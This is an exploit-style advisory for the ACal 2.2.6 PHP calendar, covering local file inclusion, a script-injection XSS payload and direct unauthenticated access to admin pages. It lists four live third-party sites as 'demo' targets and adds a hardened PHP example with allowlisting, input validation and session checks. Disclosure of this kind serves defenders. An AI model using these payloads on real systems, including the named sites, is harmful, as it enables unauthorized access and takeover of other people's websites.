ACal version 2.2.6 suffers from authentication bypass, cross site scripting, and local file inclusion vulnerabilities.
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities
[+] Category: WebApp
[+] Google Dork: Use your mind
[+] Tested on: KaliLinux
[+] Vendor: http://acalproj.sourceforge.net/
########################################################################################
+Description:
A web based event calendar that does not require a database server.
It is made to be easy to install and to be able to run on just about any typical ISP's server with PHP installed.
+Exploit:
ACal suffers from LFI, XSS and auth bypass vulnerabilities:
1/LFI:
File(s): example.php : Lines 24--30
Parameter:view
[PHP]
// DO NOT EDIT
if (!isset($_GET['view'])) {
// default view chosen by the script itself
include $path . 'embed/' . $view . '.php';
}
else {
// user-controlled value concatenated straight into the include path (LFI)
include $path . 'embed/' . $_GET['view'] . '.php';
}
[/PHP]
P.O.C:
127.0.0.1/calendar/embed/example/example.php?view=[LFI]
2/ XSS:
127.0.0.1/calendar/calendar.php?year=<script>alert(111)</script>
http://s13.postimg.org/u9bvlrg1i/www.jpg
3/Auth Bypass:
The admin panel can be reached directly, without logging in, and the login details can be changed there:
127.0.0.1/calendar/admin/changelogin.php
Demo:
http://www.benifeade.com/i/calendar/admin/changelogin.php
http://www.diprove.unimi.it/calendar/admin/edit.php
http://tavernadeglieroi.altervista.org/calendar/admin/edit.php
http://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php
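Hardened counterparts to the three issues above, written as an added illustration rather than taken from ACal: the `view` include is resolved only against a fixed allowlist, the `year` parameter from the XSS PoC is validated as digits before being echoed, and admin scripts such as changelogin.php are gated on a session flag. `$path`, the default `$view`, the `ALLOWED_VIEWS` list and the session key are assumed names, not the project's.

```php
<?php
// Added example, not ACal code. $path, the default $view, ALLOWED_VIEWS
// and the session key are assumed names chosen for illustration.
declare(strict_types=1);

$path = __DIR__ . '/';
$view = 'default';

// LFI fix: never build an include path from raw input. The request is
// mapped onto a fixed allowlist of embed views; anything else falls back.
const ALLOWED_VIEWS = ['default', 'month', 'week', 'day'];

function resolveView(?string $requested, string $fallback): string
{
    if ($requested !== null && in_array($requested, ALLOWED_VIEWS, true)) {
        return $requested;
    }
    return $fallback;
}

$viewFile = $path . 'embed/' . resolveView($_GET['view'] ?? null, $view) . '.php';
if (is_file($viewFile)) {
    include $viewFile;
}

// XSS fix for calendar.php?year=...: accept exactly four digits, then cast.
function parseYear(?string $raw, int $fallback): int
{
    if ($raw === null || !preg_match('/^\d{4}$/', $raw)) {
        return $fallback;
    }
    return (int) $raw;
}
$year = parseYear($_GET['year'] ?? null, (int) date('Y'));
// Anything echoed back is still HTML-escaped, even after validation.
echo '<h2>Calendar ' . htmlspecialchars((string) $year, ENT_QUOTES, 'UTF-8') . '</h2>';

// Auth bypass fix: admin scripts (changelogin.php, edit.php) must call this
// first; the flag is set server-side only after a successful login.
function requireAdmin(): void
{
    session_start();
    if (empty($_SESSION['admin_authenticated'])) {
        header('HTTP/1.1 403 Forbidden');
        exit('Login required');
    }
}
```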
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################